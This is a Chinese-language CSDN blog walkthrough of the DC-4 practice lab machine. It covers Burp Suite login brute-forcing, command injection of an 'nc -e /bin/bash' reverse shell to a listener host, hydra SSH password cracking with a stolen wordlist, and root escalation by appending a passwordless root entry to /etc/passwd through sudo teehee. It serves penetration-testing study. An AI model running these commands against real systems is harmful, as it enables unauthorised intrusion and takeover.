DC-4 靶机

最新推荐文章于 2024-10-08 20:17:43 发布
最新推荐文章于 2024-10-08 20:17:43 发布
阅读量141 收藏
点赞数
分类专栏: 渗透测试 文章标签: 服务器 运维 网络 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/133978808
版权
本文详细描述了一次黑客攻击过程,包括使用burpsuite进行网页登录爆破,修改数据包实现反弹shell,通过hydra破解SSH密码,以及利用sudo提权并添加root用户。展示了攻击者逐步获取系统控制的步骤。
摘要由CSDN通过智能技术生成

DC_4

信息搜集

存活检测

image-20231022204049659

详细扫描

image-20231022204104264

后台网页扫描

image-20231022204121041

网页信息搜集

image-20231022204148961

只有一个登陆界面

漏洞利用

  • 尝试使用 burpsuite 密码爆破

    尝试使用用户名 admin 登录管理员页面

  • 成功爆破出密码 happy

    image-20231022205656115

  • 登录管理员页面

    显示可以使用命令

    image-20231022205749930

  • 但只能使用三个命令

    image-20231022205835140

  • 继续使用 bp 拦截查看数据包

    发送到 Repeater 中进行调试

    image-20231022210030615

  • 可以观察到列出当前文件的指令铭文显示在 POST 传参中

    查看命令本应为 ls -l 而参数中的命令为 ls+-1,猜测此处应该使用 + 代替了空格

  • 尝试将命令修改为连接反弹 shell 的 命令

  • kali 开启 nc 监听

    nc -lvvp 7777

  • 将抓取的命令修改为

    nc+-e+/bin/bash+10.4.7.146+7777

    image-20231022210941206

  • 成功反弹

    image-20231022210959775

ssh 密码爆破

  • 搜集有用信息

    在/home/jim/backups 目录下发现了旧密码文件

    image-20231022211410659

  • 将密码文件保存

  • 靶机开启 http 上传

    python3 -m http.server 8888

    image-20231022211612326

  • kali 下载旧密码文件

    wget http://10.4.7.148:8888/old-passwords.bak

    image-20231022211648896

  • hydra 密码爆破

    hydra -l jim -P old-passwords.bak ssh://10.4.7.148 -vV -f -I

  • 成功爆破出 jim 的密码 jibril04

  • 登录

    ssh jim@10.4.7.148

    image-20231022212144918

提权

  • 尝试 sudo -l

    无 root 权限

    image-20231022212312307

  • 返回查看到登陆后收到了一封邮件

    image-20231022212630510

  • 查看邮箱

    image-20231022212730316

  • 邮箱是 Charles 发来的,并告知了他的密码 ^xHhA&hvim0y

  • 切换用户

  • 成功切换,sudo -l 查看权限

    image-20231022212947507

  • 可以使用 teehee 命令

  • 查看 teehee 命令的使用方式

    teehee --help

    image-20231022213311584

  • 帮助中显示使用 teehee -a <文件> 可以向文件中追加内容

  • 尝试向 /etc/passwd 文件中追加一条 root 用户

    sudo /usr/bin/teehee -a /etc/passwd 

    nb::0:0:root:/root:/bin/bash

    image-20231022213936715

  • 切换创建的用户

    su nb

    image-20231022214009533

    成功获取 root 权限

总结

  • burpsuite 网页登录爆破
  • burpsuite 拦截修改数据包
  • hydra 爆破 ssh 密码
  • sudo 提权
  • 向 /etc/passwd 文件添加 root 用户
gjl_
关注
专栏目录
DC-4靶机
mlws1900的博客
03-24 1192
下载不下来用迅雷下载。
DC-4靶机渗透
weixin_45349299的博客
12-21 1081
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
DC-4靶机渗透测试
读书 买花 长大
04-18 808
DC-4
DC-4靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-27 1137
文章目录前言一、DC-4的信息收集1.确定IP,端口号;2 访问目标80端口,收集信息二、通过暴力破解密码,成功登陆1.确定密码字典,利用hydra进行爆破。三. 抓包改命令,为我所用1.分析界面2.BP抓包,修改命令3 进入用户家目录收集信息4.hydra爆破ssh账户密码。四.ssh登陆总结- - -思路 前言 在本章将介绍DC-4靶机的攻略。 DC-1攻略:点击这里! DC-2攻略:点击这里! 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-4的信息收集 1.确定IP,端口号; 命令:n
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3973
DC-4靶机渗透测试详细教程
dc-4 靶机渗透学习
..
03-19 3171
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2307
vulnhub DC-4靶机实战
DC-4 靶机详解(两个解法版本)
TonyChaoWei的博客
04-11 1013
DC-4 两钟解法
DC-4靶机详细渗透过程
MRS_jianai的博客
11-30 616
dc4靶机渗透教程
DC-4靶机通关
qq_63831588的博客
07-23 1091
teehee提权,bp爆破
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1976
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
深入理解Web浏览器与服务器的连接过程
apple_64847327的博客
10-01 918
在互联网的世界里,我们每天都在浏览网页,但你是否想过,当你在浏览器中输入一个网址时,背后发生了什么?
工行企业网银U盾展期后有两个证书问题的解决方法
10-08 129
工行企业网银U盾证书快到期后,可以自助展期,流程可以根据企业网银提示页面操作。操作后,可能存在两个新旧两个证书并存的情况,致使网银转账等操作失败,其原因是新证书生成后,旧证书没有删除,只要把就证书删除即可。
【Linux进程间通信】Linux匿名管道详解:构建进程间通信的隐形桥梁
EterNity_TiMe_的计算机学习之路
10-02 2839
当提及Linux系统中的进程间通信(IPC),管道(Pipes)无疑是最基础且广泛使用的一种机制。作为匿名通信的典范,管道为进程间数据交换提供了一个简单而有效的途径。在这个信息飞速传递的时代,掌握Linux管道的使用不仅是理解操作系统底层通信原理的关键一步,也是提升软件开发效率、构建复杂应用系统的必备技能
银河麒麟v10服务器操作系统ARM版下SPECjbb2015测试
m0_49212388的博客
10-08 345
下载压缩包 bisheng-jdk-11.0.24-linux-aarch64.tar.gz.下载压缩包 bisheng-jre-11.0.24-linux-aarch64.tar.gz.进入到你想要将JDK安装的目录中,如/opt,并将 .tar.gz 压缩包拷贝到当前目录。进入到你想要将JRE安装的目录中,如/opt,并将 .tar.gz 压缩包拷贝到当前目录。1.2.1 在 Linux/AArch64 平台上安装JDK 11。ARM服务器进行SPEC jbb 2015测试。2.2 修改环境变量。
【JavaEE初阶】深入理解多线程阻塞队列的原理,如何实现生产者-消费者模型,以及服务器崩掉原因!!!
GGBond778的博客
10-02 2923
本期讲解了关于阻塞队列的特性,实现过程中存在的问题,以及解决和代码的实现,并且还利用了阻塞队列实现了生产者消费者模型;并且还理解了生产者消费者模型在实际开发中作用
linux中的火墙优化策略
最新发布
weixin_71016778的博客
10-08 467
1.火墙介绍1.火墙介绍1.netfilter2.iptables3.iptablesfirewalld。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值